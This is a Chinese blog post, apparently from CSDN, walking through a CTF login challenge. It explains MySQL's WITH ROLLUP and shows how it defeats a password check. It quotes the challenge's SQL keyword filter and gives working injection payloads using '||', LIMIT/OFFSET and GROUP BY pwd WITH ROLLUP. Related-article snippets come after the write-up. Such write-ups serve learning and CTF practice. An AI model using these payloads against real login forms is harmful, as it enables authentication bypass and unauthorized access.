mysql rollup语法_sql语法中的中的with rollup

最新推荐文章于 2024-01-02 11:25:06 发布
最新推荐文章于 2024-01-02 11:25:06 发布
阅读量275 收藏
点赞数
文章标签: mysql rollup语法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39716417/article/details/114756248
版权

就一道ctf题分析

打开一看是个登陆框,首先想到的是盲注,查看源代码,有个源文件,

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";

$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";if (mysql_num_rows($query) == 1) {

if($key['pwd'] == $_POST['pwd'])

这几处是关键,基本上过滤完了,不好注入,见有大佬用like 注入查询出了密码,

这题是让客户端的pwd和服务器端的pwd相等便得出flag,

sql中有一个with rollup是用来在分组统计数据的基础上再进行统计汇总,即用来得到group by的汇总信息;

没有with roll对的sql查询

mysql> select count(*),sage from age group by sage;

+----------+------+

| count(*) | sage |

+----------+------+

| 2 | 20 |

| 3 | 21 |

| 3 | 22 |

+----------+------+

3 rows in set (0.00 sec)

带with roll的查询

mysql> select count(*),sage from age group by sage with rollup;

+----------+------+

| count(*) | sage |

+----------+------+

| 2 | 20 |

| 3 | 21 |

| 3 | 22 |

| 8 | NULL |

+----------+------+

4 rows in set (0.00 sec)

因此这题利用with rollup使得空=null,这样可以绕过密码登陆

if (mysql_num_rows($query) == 1)这里就过不了

首先绕过这个用户名,

uname=ad' || 1 limit 1 #&pwd=

出了 亦可赛艇! 说明成功突破第一层防线

uname=admin' || 1 limit 1 offset 1 #&pwd=

同样 **亦可赛艇! **,这点很关键,说明里面不止一个用户,待会会用到这个。可以把offset(https://blog.csdn.net/yplee_8/article/details/52252549)的值改一下确认只有两个用户

接下来就是如何绕过pwd了,其实就是关键字 with rollup 他经常和group by搭配,用来统计。使用了with rollup数据会多一列,显示统计信息。

uname=ad' || 1 group by pwd with rollup limit 1 offset 2 #&pwd=

group by pwd 是按照pwd来分组,此处是为了搭配 with rollup使用

with rollup 统计pwd组的信息

with rollup 统计pwd组的信息,这里没用任何统计函数(sum,avg...),多出的那一行的pwd列只能是NULL

多出的那一行的pwd列只能是NULL

NULL和空字符串是相等的。成功绕过

weixin_39716417
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验吧——因缺思汀的绕过(sql with rollup)
weixin_30696427的博客
10-09 126
题目地址:http://ctf5.shiyanbar.com/web/pcat/index.php 通读源码,得知出flag的条件 1.需要post提交uname以及pwd,否则直接die了 1 if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { 2 echo '<form action="" method...
SQL注入_WITH ROLLUP绕过
giun的博客
04-09 972
题目地址 http://ctf5.shiyanbar.com/web/pcat/index.php <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'....
SQL 的 WITH ROLLUP 用法
ChengYanan的博客
07-29 6483
MySQL有个 with rollup 语法,用法是跟在group by 字段之后 ,可以在分组字段的基础上做一个汇总统计。 例如以下SQL: 就是在company的基础上又做了一个汇总,这个对于数据分析很有帮助。
MySQLROLLUP的替代方法
OMG!DBA
05-06 266
今天从MySQL提取数据,使用ROLLUP统计后,想在数据左边列加入项目名称,使用SQL SELECT (CASE WHEN ISNULL(PLAYERNO) THEN PLAYERNO='TOTAL' ELSE PLAYERNO END) AS PLAYERNO,SUM(AMOUNT) FROM penalties GROUP BY PLAYERNO WITH ROLLUP  结果是...
mysql 多表with rollup_MySQL 的 GROUP BY ... WITH ROLLUP
weixin_28898707的博客
01-19 176
在书上看到了 WITH ROLLUP 上滚查询的概念,我测试了一下,我的理解是如果 GROUP BY A,B,C WITH ROLLUP,那么结果是 GROUP BY A,B,C 和 GROUP BY A,B 和 GROUP BY A 和 合并全表的一次查询。测试了一下:-- 创建表 sales 并初始化数据CREATE TABLE sales(YEAR INT NOT NULL,country ...
mysql语法操作
02-13
- `GROUP BY column1, column2 WITH ROLLUP;` 分组并计算聚合函数,如COUNT、SUM等。 7. **更新操作**: - `UPDATE table_name SET column1 = value1, column2 = value2 WHERE condition;` 更新表的数据。 8. ...
SQL数据排序与分组
12-14
SQL数据排序与分组是数据库查询的核心概念,它们对于数据的分析和处理至关重要。首先,数据分组的目的是为了将具有相同值的记录合并在一起,这样可以方便地对这些记录进统计分析。例如,如果我们有一个销售记录...
02_mysql基础练习题02.docx
01-12
MySQL 是一种广泛使用的开源关系型数据库管理系统(RDBMS),它提供了丰富的SQL...这些知识点涵盖了MySQL的基本概念、SQL语法、数据操作和数据库设计原则。理解并掌握这些内容对于进有效的数据库管理和开发至关重要。
MySQL_v1.0.8.760
10-09
MySQL 4.1是2004年发布的一个主要版本,引入了诸多新功能,包括增强的SQL支持,如窗口函数和WITH ROLLUP,改进的查询优化器,以及对大型数据集的支持。此外,4.1版本还增强了存储过程、触发器和视图的功能,提高了...
CTF-Web12(涉及PHP代码审计及mysql的with rollup , limit offset的利用)
→_→
08-30 239
12.因缺思汀的绕过 分析: 先查看页面源代码,收集信息: 看来这又是一道代码审计: <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '&lt...
mysqlrollup函数_如何在MySQL ROLLUP函数替换NULL类别标题?
weixin_42300574的博客
02-08 399
使用下面的MySQL查询,我创建了一个数据透视表,它几乎与我在寻找的内容完全一样。然而,我想用实际描述替换NULL值,例如SubTotal和GrandTotal。这里是我的PHP输出显示的数据透视表格式(希望格式有点清晰!)。Name Division 1 Division 2 Division 3 Division 4 LocationName 1Name 2Name 3NULL...
mysqlrollup和limit的用法及where子句的优化
刘阳龙Herman的专栏
09-18 1059
<br />mysqlrollup和limit的用法及where子句的优化<br />1. 使用ROLLUP的分组<br />比如说某公司某个月每个营业员的销售额 sell表,其结构如下:<br />create table sell<br />(<br />sale_id int auto_increment, <br />sale_name varchar(10),<br />sale decimal(8,2),<br />primary key(sale_id)<br />);<br />Inser
记录SQL汇总统计: 在SQL使用WITH ROLLUP实现数据多维汇总
最新发布
weixin_44252983的博客
01-02 1028
记录SQL汇总统计: 在SQL使用WITH ROLLUP实现数据多维汇总
每日学习心得:SQL查询表的列转换/小计/统计(with rollup,with cube,pivot解析)...
weixin_33898876的博客
08-23 276
原文 http://www.cnblogs.com/Olive116/p/3271706.html 2013-8-20 1.    SQL查询表的列转换/小计/统计(with  rollup,with cube,pivot解析) 在实际的项目开发有很多项目都会有报表模块,今天就通过一个小的SQL查询统计来讲解一下实际开发比较常用的列转换/小计/统计等报表统计相关的常用知识点。 ...
MySQL模糊查询语句之搜索框功能实现
大灰狼来了的博客
04-25 1173
需求:对已创建的项目实现搜索框查询,并获取分页列表。 现有数据库表:pro_project 其的字段分别是 : 关联表:pro_project_company 话不多说,直接上代码 controller层: service层: 其UserHolder是封装的本地线程工具: dao层: xml文件MySQL语句: 当然,搜索条件可以自定义添加,把想要添加的都写在动态条件<where></where>。 ...
SQLUNION ALL与WITH ROLLUP的作用与区别
coffeetogether的博客
03-24 687
工作经常使用UNION ALL和ROLL UP对数据进表格合并和分组汇总。下面直接通过实例进解释,防止大家进入误区。
HITCTF2018-web全题解
蚁景网安学院
02-07 2821
点击蓝字关注我们前记最近参加了一下哈工大办的HITCTF,感觉题目可以学到知识,于是分享一下我的题解~01PHPreading发现文件泄露http://198.13.58.35:8899...
mysql with rollup 用法
06-28
mysql rollup 是一个用于生成多维度汇总报表的功能。它可以根据你在 SQL 查询指定的维度进分组,并且可以在最后一维上添加一,用来显示所有维度的总计。 语法: ``` SELECT column1, column2, ..., ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值